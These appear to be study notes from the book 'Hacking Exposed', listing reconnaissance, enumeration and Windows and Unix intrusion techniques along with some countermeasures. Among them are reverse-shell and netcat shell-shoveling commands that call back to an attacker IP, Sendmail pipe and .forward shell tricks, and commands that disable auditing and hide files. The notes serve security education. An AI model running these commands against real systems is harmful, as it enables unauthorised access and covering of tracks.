Hacking Exposed Notes Footprinting – profiling an organization Internet, Intranet, Remote Access, and Extranet presence to determine security posture and netblocksWebsite Pilfering – grabbing source code to analyze offline Unix – Wget http://www.gnu.org/software/wget/wget.html Win – Teleport Pro http://www.tenmax.com/teleport/home.htm Search Engines – tools for searching multiple engines, IRC, email, etc at once Win – FerretPRO($) http://www.ferretsoft.com Web – DogPile http://www.dogpile.com Registered Networks – internet whois searches Current Registrars http://www.internic.net/alpha.html Unix – Whois, Xwhois http://c64.org/~nr/xwhois/ Unix - $ whois “acme.”@whois.crsnic.net (list possible domains) Unix - $ whois “HANDLE JS1234”@whois.networksolutions.com (list POC info) Unix - $ whois “@acme.net”@whois.networksolutions.net (list email info) Web – US http://www.arin.net Web – International http://www.allwhois.com Web – US Military http://whois.nic.mil Web – US Gov http://whois.nic.gov DNS Interogation – zone transfers between primary and secondary Unix - $ nslookup $ server x.x.x.x $ set type=any $ ls –d Acme.net. >> /tmp/zone_out Unix - $ host –l –v –t any Acme.net Unix - $ host Acme.net (resolves Mail Exchange records) Unix – axfr http://ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz Win – Sam Spade http://www.samspade.org Network Reconnaissance – determine path to network(access path diagram)Unix - $ traceroute –S –p53 x.x.x.x ( p option allows you to specify port to start at and will increment by one; S option will stop incrementing once open port is found) Requires patch http://www.packetfactory.net/Projects/firewalk/traceroute.diff Unix – traceroute option –I uses ICMP packets, default is UDP Win – tracert(CLI) Win – VisualRoute http://www.visualroute.com , NeoTrace http://www.neotrace.com (GUI) Counter Measure – log incoming traceroutes and send back false data RotoRouter http://packetstorm.securify.com/UNIX/loggers/rr-1.0.tgz Scanning – determine systems that are alive and reachable via sweeps, port scans, and discovery tools Ping Sweeps – sending out ICMP ECHO(type 8) across ranges Unix – fping http://packetstorm.securify.com/Exploit_Code_Archive/fping.tar.gz Unix – nmap, use –sP option and valid net range, -PT<#> allows you to try other ports if blocked Unix – Hping http://www.kyuzz.org/antirez/ allows you to send fragmented packets(-f) Unix – icmpenum http://www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz ability to use ICMP TIME STAMP REQUESTS and ICMP INFO when ECHO is blocked, spoof packets with –s option, and passively list with the –p option Win – Pinger http://www.nmrc.org/files/snt/ Win – Ping Sweep http://www.solarwinds.net Additional Tools Unix – Loki2 http://www.phrack.org/show.php?p=51&a=6 wraps data in ICMP packets, used to bypass firewalls and install backdoors Port Scanning – connecting to TCP and UDP ports on a target system to see which services are running and which OSTCP connect scan – full three way handshake, easily detected by host or NIDS TCP SYN scan – no ACK is sent, only RST /ACK so that no connection is made, stealthier TCP Xmas Tree Scan – uses FIN, URG, PUSH packets to receive RST for closed ports TCP Null Scan – sends packet with no flags to receive RST for closed ports TCP ACK Scan – used to map firewall rulesets, determine statefullness TCP Windows Scan – analyzes TCP window size for OS identification and open ports TCP RCP Scan – Unix, detect RPC ports and associated program UDP Scan – looks for ICMP port unreachable, less accurate, slower Unix – Strobe ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/strobe-1.06.tgz TCP scanner, also grabs banners Unix – Saint(SATAN) http://www.saintcorporation.com/products/download.html UDP scanner Unix - netcat http://www.saintcorporation.com/products/download.html Multifunction scanner Unix – nmap, -D option for decoy scan, -I option shows owner of service(root), -b ftp bounce Win – SuperScan http://www.foundstone.com/resources/proddesc/superscan4.htm FTP Bounce Scanning - allows attacker put/get data via 3rd party server that is trusted by the target host. Requires port command and writable directory on system http://www.securityfocus.com/archive/1/3488 Scan Detection Unix – Snort http://www.snort.org/docs/ open source NIDS Unix – scanlogd http://www.openwall.com/scanlogd/ host based logging Unix – PortSentry http://sourceforge.net/projects/sentrytools/ host based, detects and blocks Unix – alert.sh http://www.spitzner.net/intrusion.html firewall scan detection Win – Genius 3.2.3 http://www.indiesoft.com/ windows host based scan detection OS Determination – using techniques such as banner grabbing, port scanning, and stack fingerprinting to determine target hosts Operating System Stack Fingerprinting – analyzing target machine’s TCP/IP stack for OS specific signatures. Each Vendor implements the TCP/IP stack slightly different. http://www.insecure.org/nmap/nmap-fingerprinting-article.html Passive Stack Fingerprinting – no connections are made, only analyzing packets via a sniffer for specific attributes such as TTL, Window Size, and DF(don’t fragment bit). The results can be compared to the Siphon fingerprint db http://www.l0t3k.org/security/tools/fingerprinting/ Discovery Tools Unix – Cheops http://www.marko.net/cheops/ Linux GUI for network discovery via ping, traceroute, queso Unix – Scotty http://wwwhome.cs.utwente.nl/~schoenw/scotty/ discovery tool, includes SNMP
Enumeration – process of extracting valid account and shared resource information for a target hostWINDOWS Windows Resouce Kits – contains useful Windows utilities Win2K - http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp - http://www.dynawell.com/support/ResKit/win2k.asp WinNT - http://www.dynawell.com/support/ResKit/winnt.asp Null Sessions – CIFS/SMB & NetBIOS all unauthenticated sessions via port 139 & 445 Win – C:>\net use \\192.168.202.33\IPC$ “” /u:”” (setting up a null session) Win – edit registry key HKLM\SYSTEM\CurrentControlSet\Control\LSA\Restrict Anonymous Must be set to 1 for NT and 2 for W2K to restrict null sessions. Read Hobbits CIFS paper for further info http://www.insecure.org/stf/cifs.txt Domain Enumeration – use netbios on UDP port 137 to list domains and domain machines Win – C:\>net view /domain C:\>net view /domain:<domain name> (lists machines on domain) NetBIOS Name Tables – grab NetBIOS names remotely Win – C:\>nbtstat –A 192.168.202.33 Win – C:\>nbtscan 192.168.234.0/24 Unix/Win versions found at http://www.inetcat.org/software/ Domain Controller Enumeration Win – C:\>nltest /dclist:<domain_name> (ran over null session nltest /server:<server_name>) C:\>nltest /trusted_domains Share Enumeration Win – C:\>net view \\<machine_name> (rmtshare, srvinfo [-s] also good NTRK) Win – DumpSec also shows file system permissions and services http://www.somarsoft.com/ Win – Legion 2.1 http://www.elhacker.net/hacking.htm
Win – NAT ftp://ftp.technotronic.com/microsoft/nat10bin.zip Misc Windows Enumeration Tools Win – Epdump RPC service/port mappings http://packetstormsecurity.org/NT/audit/epdump.zip Win – netviewx lists specific server types like domain controller, RAS, print C:\>netviewx –D <domain name> -T <server type> http://www.ibt.ku.dk/jesper/NetViewX/default.htm Win – Winfo automates null sessions http://www.ntsecurity.nu/toolbox/winfo/ Win – Nbtdump provides HTML report http://www.cerberus-infosec.co.uk/toolsn.shtml SNMP Enumeration Win – Snmputil – browses MIB(Management Information Base) tree using default strings like public, private. The tree is hierarchical, so each time you “walk up” more information is revealed. “.1.3.6.1.4.1.77.1.2.25” is the OID for Microsoft’s MIB.(NTRK) C:\>snmputil walk 192.168.202.33 public .1.3.6.1.4.1.77.1.2.25 Win – IP Browser – Solarwinds GUI, http://www.solarwinds.net More CIFS/SMB Enumeration Win – Dumpsec(DumpACL) – uses null session to get user, group, share, and policy info Win – sid2user/user2sid – allows for easy conversion of SID’s to usernames and vice versa http://www.chem.mus.su:8080/~rudnyi/NT/sid.txt C:\>user2sid \\<IP Address> “domain users” (grabs the machines SID) C:\>sid2user \\<IP Address> 5 21 8915387 1645822062 18198280005 500 (grabs admin account’s user name, note 500 is always the admin RID, even if its renamed. Also, the first account created is always given an RID of 1000 and incremented by one from there) Mark Russinovich http://www.win2000mag.com/Articles/Index.cfm?ArticleID=3143 Win – Enum – CLI utility for enumeration & password guessing http://razor.bindview.com C:\>enum –U –d –P –L –c <IP Address> Win – Nete from sirdystic of CDC, similar to enum Win – UserInfo/UserDump user Level 3 call on NetUserGetInfo API http://www.HammerofGod.com/download.htm LDAP Enumeration Win – ldp.exe – Active Directory Administration Tool – connects to AD server and allows you to browse contents, runs on either port 389 or 3268(AD Global Catolog) Banner Enumeration Banner grabbing via telnet or netcat on various ports like 80, 21, 23, 25 will often leak system, OS, application, user, or version information. Also common to “nudge” the system into coughing up more information using commands like: GET / HTTP/1.0, HEAD, QUIT, HELP, ECHO, and sometimes just carriage returns. Registry Enumeration Regdmp(NTRK) or DumpSec(Somarsoft) can be both be used to do this, however by default Win2K Server usually doesn’t allow this. Review the Key HKLM\System\CurrentControlSet\Control\SecurePipeServer\Winreg\AllowedPaths To see whats allowed UNIX NFS Enumeration Unix – showmount – lists all NFS(port 2049) exported file systems on a machine $showmount –e <IP Address> NIS Enumeraton Unix – in general various NIS client tools can be used to guess the NIS domain name of a server and retrieve NIS maps, which contain valuable information(pscan by Pluvius) User & Group Enumeration Unix – finger(port 79), rwho, rusers all list out who is on the machine at the time. To disable these services simply edit the inetd.conf file and killall –HUP inetd Unix – SMTP – VRFY <user> will confirm name of valid user; EXPN <user> will give out the actual mail address of aliases and mailing lists. Just telnet to port 25 to test. Unix – tftp – if enabled, may allow you to get the /etc/password file. RPC Enumeration Unix – rpcinfo, rpcdump – both list the RPC bindings for all applications running on the box. RPC uses ports 111, 32771. http://www.atstake.com/research/tools/info_gathering/ SNMP Enumeration Unix – the net-snmp package will usually include both snmpget and snmpwalk $ snmpget <IP Address> public system.sysName.0 (grabs host name) $ snmpwalk <IP Address> public (grabs eniter MIB) BGP Route Enumeration Unix – ASN Queries – ASN(Autonomous System Numer) is a 16-bit integer purchased from ARIN to identify a company on the internet. Use http://www.completewhois.com/ to search for this info. C:\> telnet route-views.Oregon-ix.net (public router) Ø show ip bgp <IP Address> (last number in AS Path is ASN) Ø show ip bgp regexp _<ASN>$ (will give you the public IP space of company) Windows NT Hacking – gaining access, escalating privileges and covering tracks on Windows NT system Password Guessing Default Passwords http://packetstormsecurity.org/docs/hack/dad.txt http://phenoelit.darklab.org/cgi-bin/display.pl?SUBF=list&SORT=1 http://www.cirt.net/cgi-bin/passwd.pl Null Passwords Tools NTInfoScan http://packetstormsecurity.org/NT/audit/index2.html SMBGrind http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SMBGrind&type=archives Password Sniffing SMB Packet Capture(readsmb) included with l0phtcrack PPTP – Unix based sniffer that captures VPN credentials(packetstorm) Cain & Abel filters out login credentials http://www.oxid.it/ Pass The Hash NT Only, LSASS allows hash only authentication http://www.core-sdi.com/papers/nt-cred.htm Buffer Overflows unexpected input, which forces arbitrary code into the execution stack http://www.cultdeadcow.com/cDc_files/cDc-351/page1.html by DilDog http://pulhas.org/phrack/55/P55-15.html by Barnaby Jack http://www.insecure.org/stf/smashstack.txt by Aleph One Privilege Escalation Hoovering process of stealing as much info off the machine as possible with a non-admin account. Srvinfo(NTRK) will enumerate shares and regdmp(NTRK) can probe the registry for info. Also good to script a find command in a batch file to look for the password string. GetAdmin uses DLL injection to add a user into the local admin group(crash4) http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=9231 Sechole, Secholed escalates privileges of IUSR_machine_name account on IIS, must be able to upload to a executable directory on server http://www.winnetmag.com/Article/ArticleID/9269/9269.html LPC Spoofing Password Cracking the SAM file may be obtained by booting to an alternate OS, from the repair directory, or extracting from the registry via tool. Exploiting Trusts Sniffers Remote Control & Backdoors - Remote.exe From NTRK, gives remote users a CMD shell. Most popular way to start it on the host is the us the AT command(scheduler service). SC.exe - Service Controler will start the scheduler service if its not running C:\> sc \\<ip address> start schedule C:\> net time \\<ip address> (to check time on remote system) C:\> at \\<ip address> 10:40P “”remote /s cmd secret”” (launchesserver) C:\> remote /c <ip address> secret (launches your client) C:\> nc –L –d –e cmd.exe –p80 (starts listener on target host) C:\> nc <ip address> 80 (connects attacker to target host) Netbus - similar to Back Orifice, the nbsvr.exe must be started on target first. Good idea to run in stealth mode by modifying the registry, however most Virus scans will detect it running. Default ports are 12345 and 20034 Along with these VNC, Netmeeting, and dameware are poplular gui-based remote control apps Port Redirection Netcat - “Shell Shoveling” target listens on one port while sending the output back via cmd shell to the attacker. The attacker must listen on 2 ports $ nc <attacker ip> 80 | cmd.exe | nc <attacker ip> 25 (run on target) Fpipe - Popular port redirector, also allows for specifying source port. Does have some session timeout issues though with TIME_WAIT and CLOSE_WAIT periods C:\>fpipe –v –l 53 –r 23 <ip address> (command to run on target) http://www.foundstone.com/resources/proddesc/fpipe.htm Root Kits - first Windows rootkit was from Greg Hoglund of rootkit.com. A root kit is a software suite that substitutes command system binaries with Trojans. Rootkits use a technique known as “function hooking” to redirect calls without altering the executable or binary. The current generation of Kernel level rootkits are very difficult to detect as they are embedded in the OS. http://www.antiserver.it/Backdoor-Rootkit/ Cover Tracks Disable Auditing C:\> auditpol /disable (NTRK) Clear Event Log Hiding Files C:\> attib +h [directory] (dos command) NTFS File Streaming will hide stuff as additional file attributes. It requires the POSIX utility cp(NTRK) C:\> cp <file2hide> <existing file>:<file2hide> (just reverse to unhide) Windows 2000 Hacking – gaining access, escalating privileges and covering tracks on Windows 2K system Footprinting Enumeration NetBIOS/SMB - System information will still be leaked unless you do 1 of 2 things. Disabling File and Print Sharing on your outbound interface will prevent nullsessions. Set RestrictAnonymous = 2 in either the registry or in the Security Policy Manager. Eavesdropping - All authentication sent using legacy LM hashes can be easily decrypted via L0phtcrack. Also, Kerberos authentication is not used if the user specifies an IP address instead of a hostname. SMBRelay - When trying to connect to a share/server, Windows will automatically try to log in as the current user if no other authentication information is explicitly supplied, before asking the user for a logon/password. SMBRelay will conduct a MITM attack by fooling a user into connecting to your rogue server, meanwhile after capturing the traffic it is relayed to the actual destination and back to the end user. http://www.xfocus.net/articles/200305/smbrelay.html Denial of Service New Registry Keys HKLM\Sys\CCS\Services\Tcpip\Parameters\SynAttackProtect = 2 (times out syn_received faster) EnableDeadGWDetect = 0 (prevents attacker from changing default gw) EnablePMTUDiscovery = 0 (stops hackers from lowering MTU value) KeepAliveTime = 300,000 (verify’s an idle connection is still intact) Interfaces\<int>NoNameReleaseOnDemand = 0 (stops malware) Interfaces\<int>PerformRouterDiscovery = 0 (stop router spoofing attack) Nbname - This tools puts a host in Netbios Name Conflict effectively stopping all Netbios networking on the host. Must first disable NBT on attacker machine to use tool. Privilege Escalation NetDDE - Network Dynamic Data Exchange service allows applications to share date through “trusted shares”. Runs as SYSTEM, so arbitrary code can be attached to the request and viola your admin. Requires Visual C++. Pilfering EFS Temporary - EFS writes a temp file in plain text before encrypting a new file, however a low level disk editor like diskprobe.exe(RK) can recover the file even after its deleted because the disk blocks are not overwritten. Exploiting Trust LSA Secrets - lsadump2 still functions on W2K. Microsoft doesn’t consider it a problem Multimaster Model - Within a Windows 2K forest, all domains replicate a shared Active Directory and trust each other with 2-way transitive trusts necessitated by the Kerberos implementation. Trusts between forests and NT domains are still one-way. This allows for consolidation of domains and delegation of permissions via OU’s (organizational units). Back Doors Remote Control Terminal Services running on 3389, TS allows brute force password guessing even if a lockout policy is set. TS also allows existing connections to be hijacked if the previous user forgot to logout correctly, assuming you have their credentials. New Stuff Group Policy - GPO is a new 2K feature, that allows you to configure security parameters in one place to be enforced locally or on the domain. (Gpedit.msc) Secedit - Security Configuration and Analysis tool allows admins to audit the local system security for compliance issues. It also allows you to automatically make updates and have them applied immediately. XP Stuff ICF - Internet Connection Firewall offers packet filtering on all inbound traffic, while permitting all outbound traffic. Software Restriction Policy allows central control over application security to protect against various forms of malware. Built-In Support for encrypted Wireless Networking(802.11). MS Passport single-login solution for internet, works by using a tamper-resistant cookie for accessing all sites that support MS passport authentication. Credential Management, WPA, Remote Desktop, UPNP UNIX/Linux Hacking – gaining access, escalating privileges and covering tracks on *NIX system Vulnerability Mapping is the process of mapping specific security attributes of a system to an associated vulnerability or potential vulnerability. Remote Attacks - Exploit a Listening Service (telnet, ftp, ssh, etc) Route Through a Unix System – circumvent a Unix firewall by source routing your packets through the firewall. Works only if system has IP forwarding enabling. User-Initiated Remote Execution – attacks requiring user interaction, such as browsing malicious web sites or opening email attachments. Promiscuous Mode Attacks – crafted packets can exploit your sniffer application Data Driven Attacks are executed by sending data to an active service that causes unintended or undesirable results.Buffer Overflow condition occurs when a user or process attempts to place more data into a buffer than was originally allocated. This type of behavior is associated with specific C functions like strcpy, strcat, sprintf etc. A buffer overflow condition would normally cause a segmentation violation to occur. When the attack is executed, special assembly code known as the egg is sent to the VRFY command as part of the actual string used to overflow the buffer. When it’s overrun, attackers can set the return address of the offending function, to point to their arbitrary code’s memory address, which usually includes a shell command. http://www.piaffe.org/panic/ Hell Kit for writing buffer overflows Disable stack execution in /etc/system:Set noexec_user_stack=1Set noexec_user_stack_log =1 Heap Overflows are based on overrunning memory that has been dynamically allocated by an application. This process differs from stack-based overflows, which depend on overflowing a fixed-length buffer. http://www.w00w00.org/files/heaptut/heaptut.txt Format String Vulnerability arises in subtle programming errors in the formatted output family of functions, which includes printf() and sprintf(). An attacker can take advantage of this by passing carefully crafted test strings containing formatting directives, which can cause the target computer to execute arbitrary commands. For example by using printf(buf) instead of printf(“%I”, buf) the system will read the first argument supplied by the user as the format string and allow arbitrary code to follow it. Input Validation Attacks occur when a program fails to recognize syntactically incorrect input, a module accepts extraneous input, a module fails to handle missing input fields, or a field-value correlation error occurs. Often used to exploit CGI scripts or other web applications. Shell AccessX Term if enabled is the easiest way to get local gui access on a machine remotely, but may need to be combined with an exploit though. $ /usr/X11R6/bin/xterm –ut <ip address>:0.0 Reverse Telnet/Netcat will both provide attackers with a back channel into the system that originates from the target host. Both require a listener to be running. $ /bin/telnet <attacker ip> 80 | /bin/sh | /bin/telnet <attacker ip> 25 $ nc –e /bin/sh <attacker ip> 80 TFTP/Anonymous FTP both will allow attacker to gain access to your machine and if a writeable/executable directory is available the system is toast. The services themselves may be vulnerable to exploits.Sendmail the standard Unix Mail Transfer Agent has been full of vulnerabilities dating back to 1988. Common attacks aside from buffer overflows, input validation, and SMTP enumeration include:Pipe Vulnerability which allows a user to escape to a shell after the data portion Helo Mail from: Rcpt to: bounceData. mail from: binrcpt to: |sed ‘1,/^$/d’ | shdata Forward VulnerabilityCat > .forward (create forward file to ftp to users home directory)|”cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell” (creates shell executable) $ echo hello chump | mail
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
Refer to http://www.sendmail.org/ for up to date information RPC is a mechanism that allows a program running on one computer to seamlessly execute code on a remote system. Most buffer overflow attacks target RPC services that run as root in order to gain shell access to the target sytem. Common services exploited include rpc.ttdbserverdb(tooltalk), rpc.cmsd(CDE), rpc.statd(automount), mountd, sadmind, and snmpXdmid. NFS allows transparent access to files and directories of remote systems as if they were stored locally. Most of the security provided by NFS relates to a data object known as a file handle. The file handle is a token that is used to uniquely identify each file and directory on the remote server. If a file handle can be sniffed of guessed, remote attackers could easily access those files on the remote system. $ showmount –e <host> (lists exported file systems & permissions) $ mount <host>:/ /mnt X Windows System allows exporting of the local graphical display to remote users.Xscan will scan an entire subnet looking for systems with xhosts + enabled and log any console keystrokes to a local logfile. http://www.seguridad0.net/programas/X-Scan-v3.0.zip $ xlswins –display <machine>:0.0 (will list out hex id’s for you) $ xwatchwin <machine> -w <hex ID> (allows you to observe somebody else’s x session) Promisious Mode Attacks are common in Ethereal, tcpdump, and several other sniffersSymbolic Link can be exploited using any program, especially SUID ones, that creates a temp file and doesn’t perform any sanity checking. By linking that tmp file to the /etc/password or shadow file, the program will update it with its permissions and not root’s. $ strings * | grep tmp (when run in /bin or /usr/bin, will list out good programs to target) File Descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames (0,1,2, std in, out, error). If a file descriptor is opened r/w by a privileged process, it may be possible for the attacker to write to the file while it is being modified. To shell out of vi, execute :!sh and then modify the tmp file or run exploit code.
|
